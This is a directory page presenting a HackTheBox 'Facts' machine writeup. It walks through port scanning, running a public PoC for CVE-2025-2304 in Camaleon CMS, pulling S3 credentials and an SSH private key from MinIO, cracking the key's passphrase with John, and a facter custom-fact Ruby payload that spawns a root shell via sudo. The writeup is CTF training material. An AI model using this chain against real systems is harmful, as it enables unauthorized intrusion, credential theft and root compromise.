Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
HTB-Facts-Writeup — HackTheBox Facts Maschinen-Writeup — CVE-2025-2304, MinIO S3 Enumeration, SSH-Schlüsselknacken und facter Privilegieneskalation. | Kitploit
Tools/GitHubGitHub/karimelsheikh1/htb-facts-writeup
Passwort-CrackingPrivilege EscalationAufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsCloud-Sicherheit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Lernen & Bildung
GitHubkarimelsheikh1/htb-facts-writeup

HTB-Facts-Writeup

HackTheBox Facts Maschinen-Writeup — CVE-2025-2304, MinIO S3 Enumeration, SSH-Schlüsselknacken und facter Privilegieneskalation.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

HackTheBox — Facts Maschinen-Writeup

HackTheBox Difficulty OS

Maschineninfo

FeldDetails
NameFacts
OSLinux
SchwierigkeitEasy
VeröffentlichungStaffel 10
ZurückgezogenNein

Angriffskettenübersicht

root@kitploit:~
Recon → Web Enumeration → CVE-2025-2304 (Mass Assignment) → S3/MinIO Credential Leak → SSH Key Extraction → Passphrase Cracking → User Shell → facter Sudo Abuse → Root

Verwendete Werkzeuge


Aufklärung

Port-Scan

root@kitploit:~
sudo nmap -p- --min-rate 5000 -T4 <TARGET_IP> -oN ports.nmap
sudo nmap -sV -sC -p 22,80,54321 <TARGET_IP>

Ergebnisse:

root@kitploit:~
22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu
80/tcp    open  http    nginx 1.26.3 (Camaleon CMS)
54321/tcp open  http    MinIO S3 Server
root@kitploit:~
echo "<TARGET_IP> facts.htb" | sudo tee -a /etc/hosts

Web-Enumeration

root@kitploit:~
feroxbuster -u http://facts.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 40
curl -s http://facts.htb/robots.txt
curl -s http://facts.htb/sitemap.xml

Wichtige Erkenntnisse:

  • CMS identifiziert: Camaleon CMS 2.9.0
  • Admin-Panel: http://facts.htb/admin/login
  • Registrierungsseite: http://facts.htb/admin/register

Erster Zugriff

Schritt 1 — Ein Konto registrieren

Besuchen Sie http://facts.htb/admin/register und erstellen Sie ein Konto. Beachten Sie, dass ein Captcha vorhanden ist — registrieren Sie sich über den Browser.

Schritt 2 — CVE-2025-2304 (Massenzuweisungs-Privilegieneskalation)

Der updated_ajax-Endpunkt verwendet permit!, wodurch alle Parameter einschließlich role aktualisiert werden können.

root@kitploit:~
git clone https://github.com/Alien0ne/CVE-2025-2304
cd CVE-2025-2304
python3 exploit.py -u http://facts.htb -U <username> -P <password> -e

Ausgabe:

root@kitploit:~
[+] Login confirmed
    Current User Role: client
[+] Updated User Role: admin
[+] Extracting S3 Credentials
    s3 access key: AKIAA5CA83CCFE35CD69
    s3 secret key: zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n
    s3 endpoint:   http://localhost:54321

Cloud-Enumeration — MinIO S3

Port 54321 läuft ein MinIO S3-kompatibler Server. Mit den geleakten Anmeldedaten:

root@kitploit:~
import boto3
from botocore.client import Config

s3 = boto3.client(
    's3',
    endpoint_url='http://facts.htb:54321',
    aws_access_key_id='AKIAA5CA83CCFE35CD69',
    aws_secret_access_key='zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n',
    config=Config(signature_version='s3v4'),
    region_name='us-east-1'
)

paginator = s3.get_paginator('list_objects_v2')
for page in paginator.paginate(Bucket='internal'):
    for o in page.get('Contents', []):
        if 'info-etags' not in o['Key']:
            print(o['Key'])
            s3.download_file('internal', o['Key'], '/tmp/' + o['Key'].replace('/', '_'))

Gefundene Schlüsseldateien:

root@kitploit:~
.ssh/authorized_keys
.ssh/id_ed25519        ← Privater SSH-Schlüssel
.profile
.bashrc

SSH-Schlüssel knacken

root@kitploit:~
chmod 600 /tmp/.ssh_id_ed25519
ssh2john /tmp/.ssh_id_ed25519 > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt

Geknackte Passphrase: dragonballz


Benutzershell

root@kitploit:~
ssh -i /tmp/.ssh_id_ed25519 [email protected]
# Enter passphrase: dragonballz
root@kitploit:~
cat /home/william/user.txt

Privilegieneskalation

Enumeration

root@kitploit:~
sudo -l
root@kitploit:~
(ALL) NOPASSWD: /usr/bin/facter

Exploitation — Facter Custom Fact (Ruby-Code-Ausführung)

Facter lädt benutzerdefinierte Facts als Ruby-Skripte. Da wir es als root ohne Passwort ausführen können, injizieren wir beliebigen Ruby-Code:

root@kitploit:~
mkdir -p /tmp/facts
cat > /tmp/facts/pwn.rb << 'EOF'
Facter.add(:pwn) do
  setcode do
    exec("/bin/bash -p")
  end
end
EOF

sudo facter --custom-dir=/tmp/facts pwn

Root-Shell erhalten!

root@kitploit:~
whoami   # root
cat /root/root.txt

Wichtige Erkenntnisse

  • Massenzuweisungs-Schwachstellen ermöglichen Privilegieneskalation, wenn Eingaben nicht ordnungsgemäß gefiltert werden.
  • Fehlkonfigurierte S3/MinIO-Buckets können vertrauliche Dateien einschließlich privater SSH-Schlüssel offenlegen.
  • Schwache Passphrasen auf SSH-Schlüsseln können mit gängigen Wortlisten wie rockyou geknackt werden.
  • NOPASSWD-sudo-Binärdateien müssen immer auf Missbrauchspotenzial untersucht werden.
  • Das Verketten kleiner Fehlkonfigurationen kann zu einer vollständigen Systemkompromittierung führen.

Referenzen

  • CVE-2025-2304 — Camaleon CMS Massenzuweisung
  • GTFOBins — facter
  • HackTheBox

Dieser Writeup dient nur zu Bildungszwecken. Führen Sie Sicherheitstests immer nur auf Systemen durch, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis haben.

Tool herunterladen
WerkzeugZweck
NmapPort-Scanning & Dienst-Erkennung
FeroxbusterWeb-Verzeichnis-Enumeration
CVE-2025-2304 PoCCamaleon CMS Privilegieneskalation
boto3 (Python)MinIO/S3-Enumeration & Datei-Download
ssh2johnSSH-Schlüssel in knackbaren Hash konvertieren
John the RipperSSH-Schlüssel-Passphrase knacken
facterPrivilegieneskalation durch sudo-Fehlkonfiguration